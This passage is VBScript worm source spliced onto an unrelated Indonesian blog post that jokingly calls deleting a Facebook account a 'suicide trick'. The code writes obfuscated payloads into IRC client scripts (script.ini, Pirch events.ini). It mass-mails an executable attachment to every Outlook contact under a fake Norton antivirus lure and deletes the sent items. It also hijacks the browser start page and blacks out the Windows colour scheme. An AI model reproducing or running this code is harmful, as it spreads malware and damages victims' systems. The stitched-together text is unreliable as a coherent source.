Set P35T19 = Obj.CreateTextFile(path & "\" & Chr(115) & "cript" & Chr(46) & "ini", True)
For i = 1 To Len(baca)
HVFM = Mid(baca, i, 2)
VFMH = VFMH & Chr(Asc(HVFM) - 98)
Next i
P35T19.WriteLine VFMH
P35T19.Close
End If
End Function


Function Fungsi_Pirch(path)
On Error Resume Next
Set Obj = CreateObject("scripting.filesystemobject")
Set Krjkn = CreateObject("WScript.Shell")
MasDex = "½®ÇØÇÎÕ¿ol§ÐÃÄÎÇÆŸ“ol¥Ñ×ÐÖŸ˜ol®ÇØÇΓŸ’’’·ÐÍÐÑÙÐÕol’’’·ÐÍÐÑÙÐÕ§ÐÃÄÎÇÆŸ“ol®ÇØÇΔŸ“’’®ÇØÇ΂“’’ol“’’®ÇØÇ΂“’’§ÐÃÄÎÇÆŸ“ol®ÇØÇΕŸ”’’®ÇØÇ΂”’’ol”’’®ÇØÇ΂”’’§ÐÃÄÎÇÆŸ“ol®ÇØÇΖŸ•’’®ÇØÇ΂•’’ol‚•’’®ÇØÇ΂•’’§ÐÃÄÎÇÆŸ“ol®ÇØÇΗŸ–’’®ÇØÇ΂–’’‚ol–’’®ÇØÇ΂–’’§ÐÃÄÎÇÆŸ“ol®ÇØÇΘŸ—’’®ÇØÇ΂—’’ol—’’®ÇØÇ΂—’’§ÐÃÄÎÇÆŸ“olol½’’’·ÐÍÐÑÙÐÕ¿ol·ÕÇÔ¥Ñ×ÐÖŸ’ol§ØÇÐÖ¥Ñ×ÐÖŸ’olol½“’’®ÇØÇ΂“’’¿ol·ÕÇÔ“ŸŒƒŒ¢Œol·ÕÇÔ¥Ñ×ÐÖŸ“ol§ØÇÐÖ“Ÿ±°‚¬±«°œ…œ‘ÆÅÅ‚ÖÕÇÐÆ‚†ÐËÅÍ‚¥œ¾¹«°¦±¹µ¾µÛÕ´ÑÑÖ•”ÆÎΐÇÚÇol§ØÇÐÖ¥Ñ×ÐÖŸ“olol½”’’®ÇØÇ΂”’’¿ol·ÕÇÔ¥Ñ×ÐÖŸ’ol§ØÇÐÖ¥Ñ×ÐÖŸ’olol½•’’®ÇØÇ΂•’’¿ol·ÕÇÔ¥Ñ×ÐÖŸ’ol§ØÇÐÖ¥Ñ×ÐÖŸ’olol½–’’®ÇØÇ΂–’’¿ol·ÕÇÔ¥Ñ×ÐÖŸ’ol§ØÇÐÖ¥Ñ×ÐÖŸ’olol½—’’®ÇØÇ΂—’’¿ol·ÕÇÔ¥Ñ×ÐÖŸ’ol§ØÇÐÖ¥Ñ×ÐÖŸ’ol"
If path = "" Then
If Obj.fileexists("c:\Pirc\pirch32.exe") Then path = "c:\pirch"
If Obj.fileexists("c:\Pirc32\pirch32.exe") Then path = "c:\pirch32"
P69R22 = Krjkn.regRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If Obj.fileexists(P69R22 & "\pirch\Pirch32.exe") Then path = P69R22 & "\pirch\Pirch32.exe"
End If
If path <> "" Then
Set S24K8 = Obj.CreateTextFile(path & "\events.ini", True)

For i = 1 To Len(MasDex)
HVFM = Mid(MasDex, i, 1)
VFMH = VFMH & Chr(Asc(HVFM) - 98)
Next i

S24K8.WriteLine VFMH
S24K8.Close
End If
End Function


Function Send_Outlook()
On Error Resume Next
Set Obj = CreateObject("scripting.filesystemobject")
Set Krjkn = CreateObject("WScript.Shell")
Set Q9Q83 = CreateObject("Outlook.Application")
kirimkan = Attachments.Add
hapusS = DeleteAfterSubmit
If Q9Q83 = "Outlook" Then
Set Q17U16 = Q9Q83.GetNameSpace("MAPI")
For Each Q8G83 In Q17U16.AddressLists
If Q8G83.AddressEntries.Count <> 0 Then
Q47B57 = Q8G83.AddressEntries.Count
For Q19T80 = 1 To Q47B57
Set Q0R0 = Q9Q83.CreateItem(0)
Set Q9O75 = Q8G83.AddressEntries(Q19T80)

Q0R0.To = Q9O75.Address
Q0R0.Subject = "From your old friend"
Q0R0.Body = "Download your AntiVirus With Norton Anti Virus To get" & vbCrLf & "Download free of charge take License file which we figure In"
Q0R0.kirimkan Obj.GetSpecialFolder(0) & "\SysRoot32.dll.exe"
Q0R0.hapusS = True

If Q0R0.To <> "" Then
Q0R0.Send
End If
Next
End If
Next
End If
End Function


Function HTMLR()
Randomize
Set Obj = CreateObject("scripting.filesystemobject")
Set Krjkn = CreateObject("WScript.Shell")
For i = 1 To 1000
A = Int(Rnd * 10000)
Set VGH = Obj.CreateTextFile(Obj.GetSpecialFolder(0) & "\Rose" & A & ".htm", True)
VGH.WriteLine "</html><head><title>RomanticDevil</title><meta http-equiv=""Content-Type"" content=""text/html; charset=iso-8859-1""></head> <body bgcolor=""#000000"" link=""#006600""> <p align=""right""> <font color=""#00FF00"" size=""6"" face=""Script""> <div align=""right""><font color=""#00FF00"" size=""6"" face=""Script""> A Woman 's heart is a deep ocean of secrets.</font></div><p align=""left""><font color=""#00FF00"" size=""6"" face=""Script"">But now you all know there was a man </font><font color=""#00FF00"" size=""6"" face=""Script"">named jack Dawson, and that he saved me,</font><font color=""#00FF00"" size=""6"" face=""Script"">in every way that a person can be saved.</font><p align=""right""><a href=""mailto:RomanticDevil@yahoo.com""><font size=""6"">Rose Dewitt Bukater</font></a></body></html>"
VGH.Close
Next i
Krjkn.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Local Page", Obj.GetSpecialFolder(0) & "\Rose" & A & ".htm"
Krjkn.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", Obj.GetSpecialFolder(0) & "\Rose" & A & ".htm"
End Function


Sub Gelap()
Set Krjkn = CreateObject("WScript.Shell")
Krjkn.regwrite "HKCU\Control Panel\Colors\ActiveBorder", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\ActiveTitle", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\AppWorkSpace", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\Background", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\ButtonAlternateFace", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\ButtonDkShadow", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\ButtonFace", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\ButtonHilight", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\ButtonLight", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\ButtonShadow", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\GradientActiveTitle", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\GradientInactiveTitle", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\GrayText", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\Hilight", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\HilightText", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\HotTrackingColor", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\InactiveBorder", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\InactiveTitle", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\InactiveTitleText", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\InfoWindow", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\Menu", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\TitleText", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\Window", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\MenuHilight", "0 0 0"
Krjkn.regwrite "HKCU\Control Panel\Colors\MenuBar", "0 0 0"
End Sub

Senin, 04 Januari 2010

Trik Bunuh Diri Paling Efektif!







Weitzz... Bentar dulu, jangan dulu mikir yang macem2 tentang aku yaa. Santai aja, aku ga bakal bunuh diri ko. Jadi gak perlu takut kalo ntar blog ini jadi angker karena si Admin-nya bunuh diri.. :D Tapi, yang mau aku posting ini yaitu trik bunuh diri di DuMay on Facebook..Jadi bukan bunuh diri di dunia nyata..

Sohib blogger semua, masih suka Ngefbi (on-line fb *sok2 bikin istilah baru*) ga?? Kalo udah ga suka dan gak pernah lagi buka FB sama sekali, mendingan bunuh diri aja, daripada info tentang kamu dan jejak2 kamu waktu dulu yang masih doyan ngefbi keburu dijebol hacker (kalo ada yang ngejebol misalnya..) dan takut foto2 pribadi kamu di FB kamu dicuri orang.. So, Kill your facebook, now!


Begini langkah2nya.. Mohon baca baik2 dan si Admin yang nulis ini ga kan tanggungjawab dengan konsekuensi yang akan kamu terima setelah kamu melakukan langkah2 di bawah ini :


  • Pertama dan terpenting, yakinin hati dan diri kamu kalo kamu udah ga butuh facebook kamu itu, karena setelah bunuh diri kamu ga kan bisa hidup lagi, alias data2 termasuk foto2 kamu di FB ga kan bisa kamu restore atau dibalikkin lagi..

  • Log in seperti biasa ke dalam facebook kamu..

  • Arahkan browser kamu ke https://ssl.facebook.com/help/contact.php?show_form=delete_account . .

  • Kalo udah, langsung aja klik submit..

  • Bunuh diri ga kan terasa sakit sama sekali dan walaupun tadi aku bilang FB kamu akan hilang secara permanen setelah di kill, tetapi nyawa FB kamu masih gentayangan selama kurang lebih dua minggu, jadi apabila kamu ingin nyawa FB kamu kembali, silakan Log in ke akun kamu dan klik cancel deletion..


Oke, segitu deh trik2nya..Dan ingat pesan aku bagi masyarakat dumay di warnet manapun anda berada atau kalo yang punya modem sendiri di manapun anda berada, kalo tiap stat kamu jarang banget ada yang kasi komen atau postingan blog kamu juga jarang banget ada yang kasi komentar, please, jangan bunuh diri asli yaa! dosa loh! langsung masuk neraka!!

Wassalam.